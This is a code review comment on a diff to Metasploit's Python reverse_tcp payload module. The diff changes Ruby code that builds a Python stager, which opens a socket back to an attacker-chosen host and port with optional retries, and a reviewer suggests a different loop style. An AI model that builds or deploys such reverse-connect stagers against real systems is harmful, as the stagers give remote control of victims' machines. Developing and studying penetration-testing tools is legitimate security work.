lib/msf/core/payload/python/reverse_tcp.rb

```diff
@@ -44,21 +52,24 @@ def transport_config(opts={})
 
   def generate_reverse_tcp(opts={})
     # Set up the socket
-    cmd  = "import socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n"
-    if datastore['StagerRetryWait'].blank? # do not retry at all (old style)
+    cmd  = "import socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"
+    cmd << "counter = 0\n"
+    if opts[:retry_wait].blank? # do not retry at all (old style)
       cmd << "s=socket.socket(2,socket.SOCK_STREAM)\n" # socket.AF_INET = 2
       cmd << "s.connect(('#{opts[:host]}',#{opts[:port]}))\n"
     else
-      cmd << "while 1:\n"
+      cmd << "while counter<#{opts[:retry_count].to_i}:\n"
```

Comment:
Oh I see your supporting 0 for infinite retries.
I'm bikeshedding, but how about just:
```
if opts[:retry_count] > 0
cmd << "for x in xrange(#{opts[:retry_count].to_i}):"
else
cmd << "while True"
(for example)
```